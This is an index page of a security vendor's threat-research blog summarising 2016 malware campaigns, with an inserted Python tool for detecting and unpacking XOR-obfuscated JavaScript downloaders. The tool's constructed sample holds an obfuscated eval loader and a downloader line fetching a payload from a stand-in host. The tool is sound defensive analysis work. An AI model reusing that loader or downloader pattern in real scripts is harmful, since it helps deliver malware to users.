Threat Insight

Cybersecurity research and commentary on malware, user actions, and other threats to information security
June 16, 2016

Is Angler EK Sleeping with the Fishes? Neutrino exploit kit now distributing most CryptXXX

Proofpoint Staff

Proofpoint researchers have been tracking the relatively sudden shutdown of several elements of the advanced threat ecosystem, including the Angler exploit kit, a disruption that now appears to extend well beyond the Necurs botnet outage we covered last week.

June 09, 2016

It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution

Proofpoint Staff

Proofpoint researchers take a look at the effects of an apparent outage in the massive Necurs botnet on two of the biggest names in malware: Dridex and Locky.

June 02, 2016

Malicious Macros Add Sandbox Evasion Techniques to Distribute New Dridex

Proofpoint Staff

Proofpoint researchers track new campaigns from a familiar actor using evasive macros and distributing a new Dridex sub-botnet targeting Swiss banking institutions.

June 01, 2016

CryptXXX Ransomware Learns the Samba, Other New Tricks With Version 3.100

Proofpoint Staff

With its latest version, detected last week by Proofpoint researchers, CryptXXX breaks the currently available decryption tool and adds new capabilities to encrypt shared network resources, among other updates.

May 27, 2016

Two Threats For the Price of One: Credential Phishing Leads to iSpy Keylogger

Proofpoint Staff

Proofpoint researchers recently detected a phishing campaign that ultimately led recipients to download and install the iSpy keylogger.

May 26, 2016

Locky Ransomware Actors Turning To XORed JavaScript to Bypass Traditional Defenses

Proofpoint Staff

Proofpoint researchers have observed certain threat actors distributing Locky via JavaScript attachments that use XOR obfuscation to conceal the payload, an adaptation to growing awareness of malicious JavaScript attachments in email.
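The XOR obfuscation described above, as an added example that is not Proofpoint's code and is not taken from the campaign's actual attachments. It assumes the simplest loader shape: a hex-escaped string literal decoded with charCodeAt(i) ^ key and handed to eval(). The sample script, the single-byte key 0x5A and the decoded downloader text are all constructed for illustration. The block shows both the detection side (spotting the decode loop in the script source) and the analysis side (pulling the blob out and recovering the key by brute force, which generalises to any single-byte key rather than only the one the sample uses).

```python
"""Detect and unpack a single-byte-XOR obfuscated JavaScript downloader.

Added example, not Proofpoint's code. Everything below the imports is a
constructed sample: the plaintext, the key 0x5A and the wrapper script are
assumptions chosen to illustrate the technique, not real campaign artefacts.
"""
from __future__ import annotations

import re

# Constructed plaintext: the kind of downloader a loader unpacks before eval().
SAMPLE_PLAINTEXT = (
    'var x = new ActiveXObject("MSXML2.XMLHTTP");'
    'x.open("GET", "http://example.invalid/payload.exe", false);'
    'x.send();'
)
SAMPLE_KEY = 0x5A  # assumed key; a real sample embeds its own


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key (encode and decode are the same operation)."""
    return bytes(b ^ key for b in data)


SAMPLE_OBFUSCATED = xor_bytes(SAMPLE_PLAINTEXT.encode(), SAMPLE_KEY)

# Constructed wrapper in the shape the lead-in assumes: hex-escaped literal,
# charCodeAt()^key decode loop, eval() of the result.
SAMPLE_WRAPPER = (
    'var s="' + "".join("\\x%02x" % b for b in SAMPLE_OBFUSCATED) + '";'
    'var o="";for(var i=0;i<s.length;i++){o+=String.fromCharCode(s.charCodeAt(i)^0x5a);}'
    'eval(o);'
)

# Detection: a charCodeAt() call XORed with a literal or identifier is the
# signature of the decode loop, whatever the key is.
XOR_LOOP_RE = re.compile(
    r"charCodeAt\s*\([^)]*\)\s*\^\s*(?:0x[0-9a-fA-F]+|\d+|[A-Za-z_$][\w$]*)"
)
# Extraction: a long run of \xNN escapes inside one string literal.
HEX_LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){8,})"')

# Identifiers a decoded downloader is likely to contain; used only for scoring.
JS_MARKERS = (b"ActiveXObject", b"XMLHTTP", b"eval(", b"WScript",
              b"ADODB.Stream", b"function", b"var ", b".open(", b"http")


def has_xor_decode_loop(js_source: str) -> bool:
    """True if the script contains a charCodeAt()^key decode construct."""
    return bool(XOR_LOOP_RE.search(js_source))


def extract_encoded_blob(js_source: str) -> bytes | None:
    """Return the bytes of the first long hex-escaped string literal, if any."""
    m = HEX_LITERAL_RE.search(js_source)
    if not m:
        return None
    return bytes.fromhex(m.group(1).replace("\\x", ""))


def score_candidate(buf: bytes) -> int:
    """Score how much a candidate decoding looks like JavaScript.

    Candidates that are not almost entirely printable ASCII score zero;
    otherwise the score is the printable count plus a bonus per marker hit.
    """
    printable = sum(1 for b in buf if 32 <= b < 127 or b in (9, 10, 13))
    if printable < 0.95 * len(buf):
        return 0
    return printable + sum(10 * len(m) for m in JS_MARKERS if m in buf)


def recover_single_byte_xor(blob: bytes) -> tuple[int, bytes]:
    """Brute-force all 256 keys and return (key, plaintext) with the best score."""
    best_key, best_score, best_plain = 0, -1, b""
    for key in range(256):
        plain = xor_bytes(blob, key)
        s = score_candidate(plain)
        if s > best_score:
            best_key, best_score, best_plain = key, s, plain
    return best_key, best_plain


def unpack_wrapper(js_source: str) -> str | None:
    """Full pipeline: detect the loop, extract the blob, recover the payload."""
    if not has_xor_decode_loop(js_source):
        return None
    blob = extract_encoded_blob(js_source)
    if blob is None:
        return None
    _, plain = recover_single_byte_xor(blob)
    return plain.decode("ascii", errors="replace")


if __name__ == "__main__":
    print("decode loop present:", has_xor_decode_loop(SAMPLE_WRAPPER))
    key, _ = recover_single_byte_xor(SAMPLE_OBFUSCATED)
    print("recovered key: 0x%02X" % key)
    print("payload:", unpack_wrapper(SAMPLE_WRAPPER))
```

The brute force does not need to read the key out of the script, which matters when the loader hides it behind arithmetic or a lookup; the scoring heuristic is what does the work, so extend JS_MARKERS with whatever identifiers your own samples use. Multi-byte keys and loaders that split the blob across several literals are outside what this block handles.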

May 24, 2016

Beware the JavaScript - Malicious Email Campaigns With .js Attachments Explode

Proofpoint Staff

Proofpoint researchers have been tracking what appears to be the "next big thing" in email malware distribution - JavaScript attachments by the hundreds of millions.

May 12, 2016

Hancitor and Ruckguv Reappear, Updated and With Vawtrak On Deck

Axel F, Matthew Mesa

Proofpoint researchers analyze two updated malware downloaders that have reappeared after a hiatus of several months, and profile one threat actor experimenting with various loaders to distribute Vawtrak.

May 10, 2016

Setting Sights On Retail: AbaddonPOS Now Targeting Specific POS Software

Matthew Mesa, Darien Huss

Proofpoint researchers track an updated point-of-sale malware called AbaddonPOS and its loader, distributed in targeted, personalized emails to US retailers.

May 09, 2016

CryptXXX 2.0: Ransomware Authors Strike Back Against Free Decryption Tool

Proofpoint Staff

Proofpoint researchers have been tracking Version 2.00x of the CryptXXX ransomware. The latest iteration, version 2.006, breaks the freely available decryption tool for CryptXXX.
